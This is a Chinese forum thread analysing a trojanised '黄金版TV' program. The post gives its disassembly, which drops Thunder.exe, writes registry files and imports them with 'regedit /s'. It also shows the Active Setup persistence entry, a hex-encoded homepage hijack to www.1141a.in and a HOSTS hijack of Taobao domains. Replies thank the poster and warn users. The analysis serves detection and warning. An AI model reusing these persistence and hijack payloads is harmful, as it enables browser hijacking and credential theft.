黄金TV内恶意行为分析

lkou

看到有人举报黄金TV有恶意行为，具体表现为：主页重定向，修改HOST等

简单分析一下好了

压缩包解压，得到黄金版TV.exe和uio.dll（这个是隐藏文件，分析过无问题）

OD反一下黄金版TV.exe

可以找到如下恶意行为

0040179F  /$  55            PUSH EBP
004017A0  |.  8BEC          MOV EBP,ESP
004017A2  |.  81EC 04000000 SUB ESP,4
004017A8  |.  6A 00         PUSH 0
004017AA  |.  6A 00         PUSH 0
004017AC  |.  6A 00         PUSH 0
004017AE  |.  68 02000080   PUSH 80000002
004017B3  |.  6A 00         PUSH 0
004017B5  |.  68 00000000   PUSH 0
004017BA  |.  68 04000080   PUSH 80000004
004017BF  |.  6A 00         PUSH 0
004017C1  |.  68 6BC64000   PUSH 黄金版TV.0040C66B                      ;  uio.dll
004017C6  |.  68 03000000   PUSH 3
004017CB  |.  BB C0020000   MOV EBX,2C0
004017D0  |.  E8 8B0B0000   CALL 黄金版TV.00402360         ；加载uio.dll
004017D5  |.  83C4 28       ADD ESP,28
004017D8  |.  68 01030080   PUSH 80000301
004017DD  |.  6A 00         PUSH 0
004017DF  |.  68 D0070000   PUSH 7D0
004017E4  |.  68 01000000   PUSH 1
004017E9  |.  BB 7C060000   MOV EBX,67C
004017EE  |.  E8 5D0C0000   CALL 黄金版TV.00402450
004017F3  |.  83C4 10       ADD ESP,10
004017F6  |.  68 04000080   PUSH 80000004
004017FB  |.  6A 00         PUSH 0
004017FD  |.  68 73C64000   PUSH 黄金版TV.0040C673                      ;  D:\Program\
00401802  |.  68 01000000   PUSH 1
00401807  |.  BB 34020000   MOV EBX,234
0040180C  |.  E8 4F0C0000   CALL 黄金版TV.00402460                  ；新建D:\Program文件夹
00401811  |.  83C4 10       ADD ESP,10
00401814  |.  68 05000080   PUSH 80000005
00401819  |.  6A 00         PUSH 0
0040181B  |.  68 7FC64000   PUSH 黄金版TV.0040C67F
00401820  |.  68 04000080   PUSH 80000004
00401825  |.  6A 00         PUSH 0
00401827  |.  68 97CA5600   PUSH 黄金版TV.0056CA97                      ;  D:\Program\Thunder.exe
0040182C  |.  68 02000000   PUSH 2
00401831  |.  BB 6C020000   MOV EBX,26C
00401836  |.  E8 550C0000   CALL 黄金版TV.00402490                     ；在该文件夹下生成Thunder.exe
0040183B  |.  83C4 1C       ADD ESP,1C
0040183E  |.  6A 01         PUSH 1
00401840  |.  68 00000000   PUSH 0
00401845  |.  B8 97CA5600   MOV EAX,黄金版TV.0056CA97                   ;  D:\Program\Thunder.exe
0040184A  |.  8945 FC       MOV DWORD PTR SS:[EBP-4],EAX
0040184D  |.  8D45 FC       LEA EAX,DWORD PTR SS:[EBP-4]
00401850  |.  50            PUSH EAX
00401851  |.  68 04000000   PUSH 4
00401856  |.  E8 D8000000   CALL 黄金版TV.00401933                        ；执行
0040185B  |.  8B5D FC       MOV EBX,DWORD PTR SS:[EBP-4]
0040185E  |.  85DB          TEST EBX,EBX
00401860  |.  74 09         JE SHORT 黄金版TV.0040186B
00401862  |.  53            PUSH EBX
00401863  |.  E8 7F050000   CALL 黄金版TV.00401DE7
00401868  |.  83C4 04       ADD ESP,4
0040186B  |>  68 01030080   PUSH 80000301
00401870  |.  6A 00         PUSH 0
00401872  |.  68 D0070000   PUSH 7D0
00401877  |.  68 01000000   PUSH 1
0040187C  |.  BB 7C060000   MOV EBX,67C
00401881  |.  E8 CA0B0000   CALL 黄金版TV.00402450
00401886  |.  83C4 10       ADD ESP,10
00401889  |.  68 05000080   PUSH 80000005
0040188E  |.  6A 00         PUSH 0
00401890  |.  68 AECA5600   PUSH 黄金版TV.0056CAAE
00401895  |.  68 04000080   PUSH 80000004
0040189A  |.  6A 00         PUSH 0
0040189C  |.  68 3ECC5600   PUSH 黄金版TV.0056CC3E                      ;  C:\hh.reg
004018A1  |.  68 02000000   PUSH 2
004018A6  |.  BB 6C020000   MOV EBX,26C
004018AB  |.  E8 E00B0000   CALL 黄金版TV.00402490                      ；c盘下生成hh.reg
004018B0  |.  83C4 1C       ADD ESP,1C
004018B3  |.  68 01030080   PUSH 80000301
004018B8  |.  6A 00         PUSH 0
004018BA  |.  68 01000000   PUSH 1
004018BF  |.  68 02000080   PUSH 80000002
004018C4  |.  6A 00         PUSH 0
004018C6  |.  68 00000000   PUSH 0
004018CB  |.  68 04000080   PUSH 80000004
004018D0  |.  6A 00         PUSH 0
004018D2  |.  68 48CC5600   PUSH 黄金版TV.0056CC48                      ;  regedit /s C:\hh.reg
004018D7  |.  68 03000000   PUSH 3
004018DC  |.  BB C0020000   MOV EBX,2C0
004018E1  |.  E8 7A0A0000   CALL 黄金版TV.00402360                     ；导入注册表
004018E6  |.  83C4 28       ADD ESP,28
004018E9  |.  68 01030080   PUSH 80000301
004018EE  |.  6A 00         PUSH 0
004018F0  |.  68 D0070000   PUSH 7D0
004018F5  |.  68 01000000   PUSH 1
004018FA  |.  BB 7C060000   MOV EBX,67C
004018FF  |.  E8 4C0B0000   CALL 黄金版TV.00402450
00401904  |.  83C4 10       ADD ESP,10
00401907  |.  68 04000080   PUSH 80000004
0040190C  |.  6A 00         PUSH 0
0040190E  |.  68 3ECC5600   PUSH 黄金版TV.0056CC3E                      ;  C:\hh.reg
00401913  |.  68 01000000   PUSH 1
00401918  |.  BB 44020000   MOV EBX,244
0040191D  |.  E8 0E0C0000   CALL 黄金版TV.00402530
00401922  |.  83C4 10       ADD ESP,10
00401925  |.  B8 00000000   MOV EAX,0
0040192A  |.  E9 00000000   JMP 黄金版TV.0040192F
0040192F  |>  8BE5          MOV ESP,EBP
00401931  |.  5D            POP EBP
00401932  \.  C3            RETN

hh.reg的内容为

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{f92B23AB-A707-22d2-9CBD-0000F87A469H}]
"StubPath"="D:\\Program\\Thunder.exe"

Thunder.exe这个文件给arm加壳了，放到沙盘看看

沙盘最终返回结果是在WINDOWS\System32\Drivers\etc目录下生成HOSTS，内有大量域名劫持（包括劫持了2个淘宝域名）

然后在D盘下生成ga3.reg
内容为

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command]
@=hex(2):63,00,3a,00,5c,00,70,00,72,00,6f,00,67,00,72,00,61,00,6d,00,20,00,66,\
  00,69,00,6c,00,65,00,73,00,5c,00,69,00,6e,00,74,00,65,00,72,00,6e,00,65,00,\
  74,00,20,00,65,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,5c,00,69,00,65,\
  00,78,00,70,00,6c,00,6f,00,72,00,65,00,2e,00,65,00,78,00,65,00,20,00,77,00,\
  77,00,77,00,2e,00,31,00,31,00,34,00,31,00,61,00,2e,00,69,00,6e,00,00,00

上面的HEX代表c:\program files\internet explorer\iexplore.exe www.1141a.in

由于Thunder.exe是一个inno安装程序，所以可以完全判定ga3.reg会被导入到注册表




附件传上来，大家看看玩玩好了

笨潴

Lkou手脚真快啊

今夕望月

果断强人

ak2500

我用那个东西看了一会呢

cjcworld

我也看了一会儿。。谢谢lZ

lhfi22

建议用过次软件的哥们不要登陆淘宝~更不要登陆自己的帐号！！！！
谢谢LZ给与这么快的回复！！！

svcy

还好，我从不看电视的{:1_914:}

cuihaojun168

感谢楼主。。

ShellYu

楼主高手啊。
幸好没用

lyq_superior

真是高手，好厉害啊！刚好学习下啊!